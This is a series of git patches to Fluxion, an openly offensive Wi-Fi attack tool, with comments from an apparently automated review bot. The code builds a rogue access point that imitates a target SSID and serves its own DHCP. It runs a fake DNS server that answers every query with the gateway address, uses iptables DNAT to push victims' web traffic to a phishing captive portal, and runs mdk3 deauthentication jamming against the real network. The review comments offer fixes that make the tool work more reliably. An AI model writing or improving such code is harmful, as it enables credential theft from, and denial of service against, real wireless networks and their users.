case "$IOQueryChoice" in + "$CaptivePortalAPServiceHostapdOption") + CaptivePortalAPService="hostapd" ;; + "$CaptivePortalAPServiceAirbaseOption") + CaptivePortalAPService="airbase-ng" ;; + "$FLUXIONGeneralBackOption") + return 1 + ;; + *) + fluxion_conditional_bail "Invalid AP service selected!" + return 1 + ;; + esac + fi + + # AP Service: Load the service's helper routines. + source "lib/ap/$CaptivePortalAPService.sh" +} + captive_portal_unset_authenticator() { if [ ! "$CaptivePortalAuthenticatorMode" ]; then return 0; fi @@ -144,8 +203,7 @@ captive_portal_set_authenticator() { echo -e "$FLUXIONVLine $CaptivePortalVerificationMethodQuery" echo - fluxion_target_show "$FluxionTargetSSID" "$FluxionTargetEncryption" \ - "$FluxionTargetChannel" "$FluxionTargetMAC" "$FluxionTargetMaker" + fluxion_target_show local choices=( "${CaptivePortalAuthenticationMethods[@]}" 
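Review bot: At the end of captive_portal_set_ap_service (hunk -103,6), `source "lib/ap/$CaptivePortalAPService.sh"` resolves against the current working directory, while other paths in this file are built from `$FLUXIONPath`. The script insists on running as root, so unless the main script changes directory first (not visible here), a relative `source` executes whatever `lib/ap/hostapd.sh` exists in the directory it was launched from. The return status is not checked either, so a missing helper goes unnoticed until `ap_service_prep` is called. I would write `source "$FLUXIONPath/lib/ap/$CaptivePortalAPService.sh" || return 2`.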
@@ -450,8 +508,8 @@ captive_portal_unset_attack() { sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal" # Only reset the AP if one has been defined. - if [ "$APRogueService" -a "$(type -t ap_reset)" ]; then - ap_reset + if [ "$CaptivePortalAPService" -a "$(type -t ap_service_reset)" ]; then + ap_service_reset fi } @@ -483,26 +541,33 @@ captive_portal_set_attack() { # AP Service: Prepare service for an attack. - if [ "$APRogueService" ]; then - ap_prep + if [ "$CaptivePortalAPService" ]; then + ap_service_prep \ + "$CaptivePortalAPInterface" \ + "$CaptivePortalGatewayAddress" \ + "$FluxionTargetSSID" \ + "$FluxionTargetRogueMAC" \ + "$FluxionTargetChannel" + + CaptivePortalAccessInterface=$APServiceAccessInterface fi # Generate the dhcpd configuration file, which is - # used to provide DHCP service to APRogue clients. + # used to provide DHCP service to rogue AP clients. echo "\ authoritative; default-lease-time 600; max-lease-time 7200; -subnet $CaptivePortalVIGWNetwork.0 netmask 255.255.255.0 { - option broadcast-address $CaptivePortalVIGWNetwork.255; - option routers $CaptivePortalVIGWAddress; +subnet $CaptivePortalGatewayNetwork.0 netmask 255.255.255.0 { + option broadcast-address $CaptivePortalGatewayNetwork.255; + option routers $CaptivePortalGatewayAddress; option subnet-mask 255.255.255.0; - option domain-name-servers $CaptivePortalVIGWAddress; + option domain-name-servers $CaptivePortalGatewayAddress; - range $CaptivePortalVIGWNetwork.100 $CaptivePortalVIGWNetwork.254; + range $CaptivePortalGatewayNetwork.100 $CaptivePortalGatewayNetwork.254; }\ " >"$FLUXIONWorkspacePath/dhcpd.conf" @@ -528,7 +593,7 @@ fastcgi.server = ( \".php\" => ( ( \"bin-path\" => \"/usr/bin/php-cgi\", - \"socket\" => \"/php.socket\" + \"socket\" => \"/tmp/fluxspace/php.socket\" ) ) ) 
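Review bot: In captive_portal_set_attack (hunk -483,26), `CaptivePortalAccessInterface` is assigned only inside the `if [ "$CaptivePortalAPService" ]` branch, and the status of `ap_service_prep` is ignored. Later hunks of this patch pass that variable unquoted to `ip addr add`/`ip addr del` and `dhcpd`, so on the path with no AP service those root commands run with an empty device argument unless the variable is set somewhere outside the hunks. I would fail closed: append `|| return 1` to the prep call and add `[ "$CaptivePortalAccessInterface" ] || return 1` before the routes are touched. The function body continues outside the hunk.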
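Review bot: In the web-server configuration hunk (-528,7), the new socket path hard-codes `/tmp/fluxspace/php.socket` while the surrounding code writes into `$FLUXIONWorkspacePath`, so the two drift apart if the workspace constant ever changes. The line appears to sit inside a double-quoted string, so the variable can be used directly: `\"socket\" => \"$FLUXIONWorkspacePath/php.socket\"`. Separately, the workspace is a fixed name under /tmp used by a root process; how it is created is not visible here, but checking its ownership and mode (or creating it with `mktemp -d`) before placing a socket there keeps another local user from pre-creating it.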
@@ -632,7 +697,7 @@ class DNSQuery: return packet if __name__ == '__main__': - ip='$CaptivePortalVIGWAddress' + ip='$CaptivePortalGatewayAddress' print 'pyminifakeDwebconfNS:: dom.query. 60 IN A %s' % ip udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) @@ -757,7 +822,7 @@ while [ \$AuthenticatorState = \"running\" ]; do local -r staticSSID=$(printf "%q" "$FluxionTargetSSID" | sed -r 's/\\\ / /g' | sed -r "s/\\\'/\'/g") echo " - DHCPClients=($(nmap -PR -sn -n -oG - $CaptivePortalVIGWNetwork.100-110 2>&1 | grep Host)) + DHCPClients=($(nmap -PR -sn -n -oG - $CaptivePortalGatewayNetwork.100-110 2>&1 | grep Host)) echo echo -e \" ACCESS POINT:\" @@ -981,7 +1046,7 @@ captive_portal_unset_routes() { sandbox_remove_workfile "$FLUXIONWorkspacePath/ip_forward" fi - ip addr del $CaptivePortalVIGWAddress/24 dev $VIGW 2>/dev/null + ip addr del $CaptivePortalGatewayAddress/24 dev $CaptivePortalAccessInterface 2>/dev/null } # Set up DHCP / WEB server @@ -989,7 +1054,7 @@ captive_portal_unset_routes() { captive_portal_set_routes() { # Give an address to the gateway interface in the rogue network. # This makes the interface accessible from the rogue network. - ip addr add $CaptivePortalVIGWAddress/24 dev $VIGW + ip addr add $CaptivePortalGatewayAddress/24 dev $CaptivePortalAccessInterface # Save the system's routing state to restore later. cp "/proc/sys/net/ipv4/ip_forward" "$FLUXIONWorkspacePath/ip_forward" @@ -1006,9 +1071,9 @@ captive_portal_set_routes() { iptables -P FORWARD ACCEPT iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT \ - --to-destination $CaptivePortalVIGWAddress:80 + --to-destination $CaptivePortalGatewayAddress:80 iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT \ - --to-destination $CaptivePortalVIGWAddress:443 + --to-destination $CaptivePortalGatewayAddress:443 iptables -A INPUT -p tcp --sport 443 -j ACCEPT iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT iptables -t nat -A POSTROUTING -j MASQUERADE 
@@ -1017,27 +1082,27 @@ captive_portal_set_routes() { captive_portal_stop_interface() { captive_portal_unset_routes - if [ "$APRogueService" ]; then - ap_stop + if [ "$CaptivePortalAPService" ]; then + ap_service_stop fi } captive_portal_start_interface() { - if [ "$APRogueService" ]; then + if [ "$CaptivePortalAPService" ]; then echo -e "$FLUXIONVLine $CaptivePortalStaringAPServiceNotice" - ap_start + ap_service_start else fluxion_header echo -e "$FLUXIONVLine Configuration for external access point device:" echo - fluxion_target_show "$APRogueSSID" "OPEN" "$FluxionTargetChannel" "$APRogueMAC" "$FluxionTargetMaker" + fluxion_target_show - echo -e "$FLUXIONVLine IPv4 Address: ${CaptivePortalVIGWAddress%.*}.2/24" + echo -e "$FLUXIONVLine IPv4 Address: ${CaptivePortalGatewayAddress%.*}.2/24" echo -e "$FLUXIONVLine IPv6 Address: Disabled" - echo -e "$FLUXIONVLine DHCP Server: $CaptivePortalVIGWAddress" - echo -e "$FLUXIONVLine DNS Server: $CaptivePortalVIGWAddress" + echo -e "$FLUXIONVLine DHCP Server: $CaptivePortalGatewayAddress" + echo -e "$FLUXIONVLine DNS Server: $CaptivePortalGatewayAddress" echo echo -e "$FLUXIONVLine ${CYel}Assure external AP device is available & configured before continuing!${CClr}" @@ -1124,6 +1189,7 @@ prep_attack() { local sequence=( "set_jammer_interface" "set_ap_interface" + "set_ap_service" "set_authenticator" "set_certificate" "set_connectivity" 
@@ -1196,7 +1262,7 @@ start_attack() { echo -e "$FLUXIONVLine $CaptivePortalStartingDHCPServiceNotice" xterm $FLUXIONHoldXterm $TOPLEFT -bg black -fg "#CCCC00" \ -title "FLUXION AP DHCP Service" -e \ - "dhcpd -d -f -lf \"$FLUXIONWorkspacePath/dhcpd.leases\" -cf \"$FLUXIONWorkspacePath/dhcpd.conf\" $VIGW 2>&1 | tee -a \"$FLUXIONWorkspacePath/clients.txt\"" & + "dhcpd -d -f -lf \"$FLUXIONWorkspacePath/dhcpd.leases\" -cf \"$FLUXIONWorkspacePath/dhcpd.conf\" $CaptivePortalAccessInterface 2>&1 | tee -a \"$FLUXIONWorkspacePath/clients.txt\"" & # Save parent's pid, to get to child later. CaptivePortalDHCPServiceXtermPID=$! @@ -1221,7 +1287,7 @@ start_attack() { echo -e "$FluxionTargetMAC" >"$FLUXIONWorkspacePath/mdk3_blacklist.lst" xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" \ -title "FLUXION AP Jammer Service [$FluxionTargetSSID]" -e \ - "mdk3 $WIMonitor d -c $FluxionTargetChannel -b \"$FLUXIONWorkspacePath/mdk3_blacklist.lst\"" & + "mdk3 $CaptivePortalJammerInterface d -c $FluxionTargetChannel -b \"$FLUXIONWorkspacePath/mdk3_blacklist.lst\"" & # Save parent's pid, to get to child later. CaptivePortalJammerServiceXtermPID=$! diff --git a/attacks/Captive Portal/language/en.sh b/attacks/Captive Portal/language/en.sh index bbf7fb6..46d854e 100755 --- a/attacks/Captive Portal/language/en.sh +++ b/attacks/Captive Portal/language/en.sh @@ -4,6 +4,10 @@ CaptivePortalJammerInterfaceQuery="Select an interface for jamming." CaptivePortalAPInterfaceQuery="Select an interface for the access point." + +CaptivePortalAPServiceQuery="Select an access point service" +CaptivePortalAPServiceHostapdOption="Rogue AP - hostapd (${CGrn}recommended$CClr)" +CaptivePortalAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}slow$CClr)" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> CaptivePortalInterfaceQuery="Select an interface for the captive portal." CaptivePortalStartingInterfaceNotice="Starting captive portal interface..." 
From 9fce798206eaa58e3be4ff313c9b515f5382bebf Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Fri, 19 Jan 2018 13:59:15 -0600 Subject: [PATCH 27/45] Fixed interface restoration bug & enhanced notices. --- fluxion | 23 +++++++++++++---------- language/en.sh | 8 +++++--- 2 files changed, 18 insertions(+), 13 deletions(-) diff --git a/fluxion b/fluxion index a59906e..53926eb 100755 --- a/fluxion +++ b/fluxion @@ -240,7 +240,7 @@ fluxion_startup() { sleep 0.1 local -r versionInfo="${CSRed}FLUXION $FLUXIONVersion$CClr" local -r revisionInfo="(rev. $CSBlu$FLUXIONRevision$CClr)" - local -r credits="${CYel}by$CWht FluxionNetwork" + local -r credits="by$CCyn FluxionNetwork$CClr" format_center_literals "$versionInfo $revisionInfo $credits" echo -e "$FormatCenterLiterals" @@ -315,13 +315,10 @@ fluxion_shutdown() { # If allocated interfaces exist, deallocate them now. if [ ${#FluxionInterfaces[@]} -gt 0 ]; then - echo -e "$FLUXIONVLine $FLUXIONRemovingExtraWINotice" - local interface for interface in "${!FluxionInterfaces[@]}"; do # Only deallocate fluxion or airmon-ng created interfaces. if [[ "$interface" == "flux"* || "$interface" == *"mon"* ]]; then - echo -e "$CWht[$CRed-$CWht] $FLUXIONDisablingMonitorNotice$CGrn $interface$CClr" fluxion_deallocate_interface $interface fi done 
@@ -680,13 +677,14 @@ fluxion_deallocate_interface() { # Release interfaces # Assure the interface is in the allocation table. if [ ! "$newIdentifier" ]; then return 2; fi - if interface_is_wireless $oldInterface; then - # Unblock interfaces to make them available. - echo -e "$FLUXIONVLine $FLUXIONUnblockingWINotice" - rfkill unblock all &> $FLUXIONOutputDevice + local interfaceIdentifier=$newIdentifier + echo -e "$CWht[$CSRed-$CWht] "$( + io_dynamic_output "$FLUXIONDeallocatingInterfaceNotice" + )"$CClr" + if interface_is_wireless $oldIdentifier; then # Attempt deactivating monitor mode on the interface. - if interface_set_mode $oldIdentifier managed; then + if ! interface_set_mode $oldIdentifier managed; then return 3 fi fi @@ -727,7 +725,12 @@ fluxion_allocate_interface() { # Reserve interfaces if ! interface_is_real $identifier; then return 2; fi - echo -e "$FLUXIONVLine $FLUXIONAllocatingInterfaceNotice" + + local interfaceIdentifier=$identifier + echo -e "$CWht[$CSGrn+$CWht] "$( + io_dynamic_output "$FLUXIONAllocatingInterfaceNotice" + )"$CClr" + if interface_is_wireless $identifier; then # Unblock wireless interfaces to make them available. diff --git a/language/en.sh b/language/en.sh index 0062403..7a4286b 100755 --- a/language/en.sh +++ b/language/en.sh 
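Review bot: In fluxion_deallocate_interface (hunk -680,13) the `$( io_dynamic_output … )` substitution sits between two quoted strings and is itself unquoted, so the notice is word-split and glob-expanded before `echo` sees it; the same construct is added in fluxion_allocate_interface (hunk -727,7). Moving it inside the quotes keeps the text intact: `echo -e "$CWht[$CSRed-$CWht] $(io_dynamic_output "$FLUXIONDeallocatingInterfaceNotice")$CClr"`. The template depends on a local named `interfaceIdentifier` being in scope when io_dynamic_output runs, which deserves a one-line comment such as `# Read by the notice template through dynamic scoping.` If io_dynamic_output expands the template with `eval` (not visible here), the identifier should be validated before it is interpolated.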
@@ -3,9 +3,11 @@ # native: English FLUXIONInterfaceQuery="Select a wireless interface" -FLUXIONAllocatingInterfaceNotice="Starting interface reservation..." -FLUXIONReidentifyingInterface="Renaming interface..." -FLUXIONUnblockingWINotice="Unblocking all wireless interfaces..." +FLUXIONAllocatingInterfaceNotice="Allocating reserved interface $CGrn\"\$interfaceIdentifier\"." +FLUXIONDeallocatingInterfaceNotice="Deallocating reserved interface $CGrn\"\$interfaceIdentifier\"." +FLUXIONReidentifyingInterface="Renaming interface." +FLUXIONUnblockingWINotice="Unblocking all wireless interfaces." + #FLUXIONFindingExtraWINotice="Looking for extraneous wireless interfaces..." FLUXIONRemovingExtraWINotice="Removing extraneous wireless interfaces..." FLUXIONFindingWINotice="Looking for available wireless interfaces..." From 890c7199dfbfb86ae8fbea1184d639d3ea1c72f5 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Fri, 19 Jan 2018 14:02:43 -0600 Subject: [PATCH 28/45] Added preferences script to git-ignore. --- .gitignore | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.gitignore b/.gitignore index e9168d9..53f35c7 100644 --- a/.gitignore +++ b/.gitignore @@ -5,6 +5,8 @@ *.log BullyOutput.txt +/preferences.sh* + # temporary files which can be created if a process still has a handle open of a deleted file .fuse_hidden* From 03850c56a59584fa034770f38d8b3a4fd897277f Mon Sep 17 00:00:00 2001 From: deltax Date: Fri, 19 Jan 2018 21:47:32 +0100 Subject: [PATCH 29/45] Update .gitignore --- .gitignore | 1 + 1 file changed, 1 insertion(+) diff --git a/.gitignore b/.gitignore index 53f35c7..f2500c2 100644 --- a/.gitignore +++ b/.gitignore @@ -3,6 +3,7 @@ *.swo *.cap *.log +*.backup BullyOutput.txt /preferences.sh* From 004fe9abb61dc90fe253f3483dfd9c53345f0088 Mon Sep 17 00:00:00 2001 From: deltax Date: Fri, 19 Jan 2018 21:49:53 +0100 Subject: [PATCH 30/45] Minor auto tweaks --- fluxion | 1 + 1 file changed, 1 insertion(+) 
diff --git a/fluxion b/fluxion index 53926eb..f4d7e9b 100755 --- a/fluxion +++ b/fluxion @@ -105,6 +105,7 @@ while [ "$1" != "--" ]; do -r|--reloader) declare -r FLUXIONWIReloadDriver=1;; -n|--airmon-ng) declare -r FLUXIONAirmonNG=1;; -m|--multiplexer) declare -r FLUXIONTMux=1;; + -a|--auto) declare -r FLUXIONTAuto=1;; -b|--bssid) FluxionTargetMAC=$2; shift;; -e|--essid) FluxionTargetSSID=$2; shift;; -c|--channel) FluxionTargetChannel=$2; shift;; From 915fddccd420b484ca8e18a0072962da774ad31e Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Fri, 19 Jan 2018 15:53:46 -0600 Subject: [PATCH 31/45] Fixed interface initialization & tweaked defaults. Fixed a bug caused by a failure to initialize interfaces after selection. Tweaked some default values, when using auto-mode. --- attacks/Captive Portal/attack.sh | 128 +++++++++++++++++----------- attacks/Handshake Snooper/attack.sh | 25 ++++-- 2 files changed, 96 insertions(+), 57 deletions(-) diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index 4e0f64a..c76fb20 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh 
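Review bot: The new `-a|--auto)` arm (hunk -105,6) sets `FLUXIONTAuto`, but the checks elsewhere in this series test `FLUXIONAuto`, so the flag has no effect as written. The same case statement also has a `-a|--attack)` arm further down (visible in a later hunk of this series); the first matching pattern wins, so `-a ATTACK` would land here and the attack name would be left behind as a stray argument. I would drop the short form and fix the name, `--auto) FLUXIONAuto=1;;`, keeping in mind that `FLUXIONAuto` is already declared read-only just above the loop whenever options are passed, so a second `declare -r` needs a guard.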
@@ -38,15 +38,27 @@ captive_portal_unset_jammer_interface() { captive_portal_set_jammer_interface() { if [ "$CaptivePortalJammerInterface" ]; then return 0; fi - echo "Running get jammer interface." > $FLUXIONOutputDevice - if ! fluxion_get_interface attack_targetting_interfaces \ - "$CaptivePortalJammerInterfaceQuery"; then - echo "Failed to get jammer interface" > $FLUXIONOutputDevice - return 1 + + if [ ! "$CaptivePortalUninitializedJammerInterface" ]; then + echo "Running get jammer interface." > $FLUXIONOutputDevice + if ! fluxion_get_interface attack_targetting_interfaces \ + "$CaptivePortalJammerInterfaceQuery"; then + echo "Failed to get jammer interface" > $FLUXIONOutputDevice + return 1 + fi + local selectedInterface=$FluxionInterfaceSelected + else + local selectedInterface=$CaptivePortalUninitializedJammerInterface + unset CaptivePortalUninitializedJammerInterface + fi + + if ! fluxion_allocate_interface $selectedInterface; then + echo "Failed to allocate jammer interface" > $FLUXIONOutputDevice + return 2 fi echo "Succeeded get jammer interface." > $FLUXIONOutputDevice - CaptivePortalJammerInterface=${FluxionInterfaces[$FluxionInterfaceSelected]} + CaptivePortalJammerInterface=${FluxionInterfaces[$selectedInterface]} } captive_portal_ap_interfaces() { 
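Review bot: In captive_portal_set_jammer_interface (hunk -38,15), `selectedInterface` can now come straight from the `-j` command-line value and is passed unquoted to `fluxion_allocate_interface`. An empty value makes the call run with no argument at all, and a value with spaces is split into several, instead of producing the documented return code; quote it: `if ! fluxion_allocate_interface "$selectedInterface"; then`. The same pattern is added in captive_portal_set_ap_interface (hunk -59,33) and in handshake_snooper_set_jammer_interface (Handshake Snooper hunk -237,15). Declaring `local selectedInterface` once before the `if` would also remove the duplicated declaration in both branches.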
@@ -59,33 +71,44 @@ captive_portal_ap_interfaces() { } captive_portal_unset_ap_interface() { - if [ ! "$CaptivePortalAPInterface" ]; then return 1; fi - if [ "$CaptivePortalAPInterface" = \ + if [ ! "$CaptivePortalAccessPointInterface" ]; then return 1; fi + if [ "$CaptivePortalAccessPointInterface" = \ "${CaptivePortalJammerInterface}v" ]; then - if ! iw dev $CaptivePortalAPInterface del \ + if ! iw dev $CaptivePortalAccessPointInterface del \ &> $FLUXIONOutputDevice; then fluxion_conditional_bail "Unable to remove virtual interface!" exit 1 fi fi - CaptivePortalAPInterface="" + CaptivePortalAccessPointInterface="" } captive_portal_set_ap_interface() { - if [ "$CaptivePortalAPInterface" ]; then return 0; fi + if [ "$CaptivePortalAccessPointInterface" ]; then return 0; fi - echo "Running get ap interface." > $FLUXIONOutputDevice - if ! fluxion_get_interface captive_portal_ap_interfaces \ - "$CaptivePortalAPInterfaceQuery"; then - echo "Failed to get ap interface" > $FLUXIONOutputDevice - return 1 + if [ ! "$CaptivePortalUninitializedAccessPointInterface" ]; then + echo "Running get ap interface." > $FLUXIONOutputDevice + if ! fluxion_get_interface captive_portal_ap_interfaces \ + "$CaptivePortalAccessPointInterfaceQuery"; then + echo "Failed to get ap interface" > $FLUXIONOutputDevice + return 1 + fi + local selectedInterface=$FluxionInterfaceSelected + else + local selectedInterface=$CaptivePortalUninitializedAccessPointInterface + unset CaptivePortalUninitializedAccessPointInterface + fi + + if ! fluxion_allocate_interface $selectedInterface; then + echo "Failed to allocate ap interface" > $FLUXIONOutputDevice + return 2 fi echo "Succeeded get ap interface." > $FLUXIONOutputDevice - CaptivePortalAPInterface=${FluxionInterfaces[$FluxionInterfaceSelected]} + CaptivePortalAccessPointInterface=${FluxionInterfaces[$selectedInterface]} # If interfaces are the same, we need an independent virtual interface. 
- if [ "$CaptivePortalAPInterface" = \ + if [ "$CaptivePortalAccessPointInterface" = \ "$CaptivePortalJammerInterface" ]; then # TODO: Make fluxion's interface services manage virtual interfaces. # Have fluxion_get_interface return a virutal interface if the primary @@ -99,7 +122,7 @@ captive_portal_set_ap_interface() { return 2 fi echo "Virtual interface created successfully." > $FLUXIONOutputDevice - CaptivePortalAPInterface=${CaptivePortalJammerInterface}v + CaptivePortalAccessPointInterface=${CaptivePortalJammerInterface}v fi } @@ -111,14 +134,14 @@ function captive_portal_unset_ap_service() { # Since we're auto-selecting when on auto, trigger undo-chain. if [ "$FLUXIONAuto" ]; then return 2; fi - if ! interface_is_wireless "$CaptivePortalAPInterface"; then + if ! interface_is_wireless "$CaptivePortalAccessPointInterface"; then return 3; fi } function captive_portal_set_ap_service() { if [ "$CaptivePortalAPService" ]; then return 0; fi - if ! interface_is_wireless "$CaptivePortalAPInterface"; then + if ! interface_is_wireless "$CaptivePortalAccessPointInterface"; then return 0; fi @@ -264,6 +287,9 @@ captive_portal_run_certificate_generator() { captive_portal_unset_certificate() { if [ ! "$CaptivePortalSSL" ]; then return 1; fi + # WARNING: The server configuration depends on whether the certificate + # file exists and is positioned in the proper location. The check above + # could unsynchronize with the certificate file if we're not careful! sandbox_remove_workfile "$FLUXIONWorkspacePath/server.pem" CaptivePortalSSL="" @@ -290,7 +316,7 @@ captive_portal_set_certificate() { cp "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" \ "$FLUXIONWorkspacePath/server.pem" - CaptivePortalSSL="enabled" # Must be enabled if sourcing own certificate + CaptivePortalSSL="enabled" # Enabled if sourcing user certificate echo "Captive Portal certificate was user supplied, skipping query!" \ > $FLUXIONOutputDevice 
@@ -298,12 +324,7 @@ captive_portal_set_certificate() { fi if [ "$FLUXIONAuto" ]; then - # If cert generator fails, gtfo, something broke! - if ! captive_portal_run_certificate_generator; then - fluxion_conditional_bail "cert-gen failed!" - return 2 - fi - CaptivePortalSSL="enabled" + CaptivePortalSSL="disabled" else local choices=( "$CaptivePortalCertificateSourceGenerateOption" @@ -349,6 +370,9 @@ captive_portal_set_certificate() { captive_portal_unset_connectivity() { if [ ! "$CaptivePortalConnectivity" ]; then return 1; fi CaptivePortalConnectivity="" + + # Since we're auto-selecting when on auto, trigger undo-chain. + if [ "$FLUXIONAuto" ]; then return 2; fi } captive_portal_set_connectivity() { 
@@ -356,26 +380,30 @@ captive_portal_set_connectivity() { captive_portal_unset_connectivity - local choices=( - "$CaptivePortalConnectivityDisconnectedOption" - "$CaptivePortalConnectivityEmulatedOption" - "$FLUXIONGeneralBackOption" - ) - io_query_choice "$CaptivePortalConnectivityQuery" choices[@] + if [ "$FLUXIONAuto" ]; then + CaptivePortalConnectivity="disconnected" + else + local choices=( + "$CaptivePortalConnectivityDisconnectedOption" + "$CaptivePortalConnectivityEmulatedOption" + "$FLUXIONGeneralBackOption" + ) + io_query_choice "$CaptivePortalConnectivityQuery" choices[@] - case "$IOQueryChoice" in - "$CaptivePortalConnectivityDisconnectedOption") - CaptivePortalConnectivity="disconnected" ;; - "$CaptivePortalConnectivityEmulatedOption") - CaptivePortalConnectivity="emulated" ;; - "$FLUXIONGeneralBackOption") - return 1 - ;; - *) - fluxion_conditional_bail "Unknown connectivity option!" - return 2 - ;; - esac + case "$IOQueryChoice" in + "$CaptivePortalConnectivityDisconnectedOption") + CaptivePortalConnectivity="disconnected" ;; + "$CaptivePortalConnectivityEmulatedOption") + CaptivePortalConnectivity="emulated" ;; + "$FLUXIONGeneralBackOption") + return 1 + ;; + *) + fluxion_conditional_bail "Unknown connectivity option!" + return 2 + ;; + esac + fi } captive_portal_unset_user_interface() { @@ -543,7 +571,7 @@ captive_portal_set_attack() { # AP Service: Prepare service for an attack. if [ "$CaptivePortalAPService" ]; then ap_service_prep \ - "$CaptivePortalAPInterface" \ + "$CaptivePortalAccessPointInterface" \ "$CaptivePortalGatewayAddress" \ "$FluxionTargetSSID" \ "$FluxionTargetRogueMAC" \ 
@@ -1144,9 +1172,9 @@ fi while [ "$1" != "" -a "$1" != "--" ]; do case "$1" in -a|--ap) - CaptivePortalAccessPointInterface=$2; shift;; + CaptivePortalUninitializedAccessPointInterface=$2; shift;; -j|--jammer) - CaptivePortalJammerInterface=$2; shift;; + CaptivePortalUninitializedJammerInterface=$2; shift;; -s|--ssl) CaptivePortalSSLCertificatePath=$2; shift;; -c|--connectivity) diff --git a/attacks/Handshake Snooper/attack.sh b/attacks/Handshake Snooper/attack.sh index 1f6003c..af806da 100755 --- a/attacks/Handshake Snooper/attack.sh +++ b/attacks/Handshake Snooper/attack.sh @@ -237,15 +237,26 @@ handshake_snooper_set_jammer_interface() { if [ "$HANDSHAKEDeauthenticatorIdentifier" = \ "$HandshakeSnooperMonitorMethodOption" ]; then return 0; fi - echo "Running get jammer interface." > $FLUXIONOutputDevice - if ! fluxion_get_interface attack_targetting_interfaces \ - "$HandshakeSnooperJammerInterfaceQuery"; then - echo "Failed to get jammer interface" > $FLUXIONOutputDevice - return 1 + if [ ! "$HandshakeSnooperUninitializedJammerInterface" ]; then + echo "Running get jammer interface." > $FLUXIONOutputDevice + if ! fluxion_get_interface attack_targetting_interfaces \ + "$HandshakeSnooperJammerInterfaceQuery"; then + echo "Failed to get jammer interface" > $FLUXIONOutputDevice + return 1 + fi + local selectedInterface=$FluxionInterfaceSelected + else + local selectedInterface=$HandshakeSnooperUninitializedJammerInterface + unset HandshakeSnooperUninitializedJammerInterface + fi + + if ! fluxion_allocate_interface $selectedInterface; then + echo "Failed to allocate jammer interface" > $FLUXIONOutputDevice + return 2 fi echo "Succeeded get jammer interface." > $FLUXIONOutputDevice - HandshakeSnooperJammerInterface=${FluxionInterfaces[$FluxionInterfaceSelected]} + HandshakeSnooperJammerInterface=${FluxionInterfaces[$selectedInterface]} } handshake_snooper_unset_verifier_identifier() { 
@@ -367,7 +378,7 @@ while [ "$1" != "" -a "$1" != "--" ]; do -i|--interval) HandshakeSnooperVerifierInterval=$2; shift;; -j|--jammer) - HandshakeSnooperJammerInterface=$2; shift;; + HandshakeSnooperUninitializedJammerInterface=$2; shift;; -a|--asynchronous) HandshakeSnooperVerifierSynchronicity="non-blocking";; esac From be08c68bfab41a161258b7fdf8559d98f62d10a5 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Sat, 20 Jan 2018 02:44:30 -0600 Subject: [PATCH 32/45] Fixed missing attack parameters bug. --- fluxion | 20 ++++++++++++-------- 1 file changed, 12 insertions(+), 8 deletions(-) diff --git a/fluxion b/fluxion index f4d7e9b..b1e5014 100755 --- a/fluxion +++ b/fluxion @@ -85,7 +85,8 @@ if ! FLUXIONCLIArguments=$( echo -e "${CRed}Aborted$CClr, parameter error detected..."; exit 5 fi -declare -r FLUXIONCLIArguments=$FLUXIONCLIArguments +AttackCLIArguments=${FLUXIONCLIArguments##*--} +declare -r FLUXIONCLIArguments=${FLUXIONCLIArguments%%--*} # ============================================================ # @@ -97,7 +98,7 @@ eval set -- "$FLUXIONCLIArguments" # Set environment parameters. [ "$1" != "--" ] && declare -r FLUXIONAuto=1 # Auto-mode if using CLI. -while [ "$1" != "--" ]; do +while [ "$1" != "" -a "$1" != "--" ]; do case "$1" in -v|--version) echo "FLUXION V$FLUXIONVersion.$FLUXIONRevision"; exit;; -d|--debug) declare -r FLUXIONDebug=1;; @@ -105,7 +106,6 @@ while [ "$1" != "--" ]; do -r|--reloader) declare -r FLUXIONWIReloadDriver=1;; -n|--airmon-ng) declare -r FLUXIONAirmonNG=1;; -m|--multiplexer) declare -r FLUXIONTMux=1;; - -a|--auto) declare -r FLUXIONTAuto=1;; -b|--bssid) FluxionTargetMAC=$2; shift;; -e|--essid) FluxionTargetSSID=$2; shift;; -c|--channel) FluxionTargetChannel=$2; shift;; 
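Review bot: The split added at the top of the script (hunk -85,7) cuts on any `--` substring rather than on the standalone separator: `%%--*` truncates at the first long option (for `--essid x -- -j wlan0` nothing is left for fluxion), and `##*--` strips through the last one, so an attack option such as `--jammer` or a value containing `--` leaves a fragment with unbalanced quotes. That fragment is later fed to `eval set --` in fluxion_prep_attack. Splitting after getopt's output has been re-parsed into words avoids both problems; the fence shows one way, re-quoting each word with `printf '%q'` so the existing `eval set --` calls keep working.

```shell
# Re-parse getopt's output and split at the standalone "--" word,
# not at the first or last "--" substring.
eval set -- "$FLUXIONCLIArguments"
FLUXIONCLIArguments=""
while [ $# -gt 0 ] && [ "$1" != "--" ]; do
  FLUXIONCLIArguments+=" $(printf '%q' "$1")"
  shift
done
if [ "$1" = "--" ]; then shift; fi
AttackCLIArguments=""
while [ $# -gt 0 ]; do
  AttackCLIArguments+=" $(printf '%q' "$1")"
  shift
done
declare -r FLUXIONCLIArguments
# … unchanged: argument-loaded configurables loop …
```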
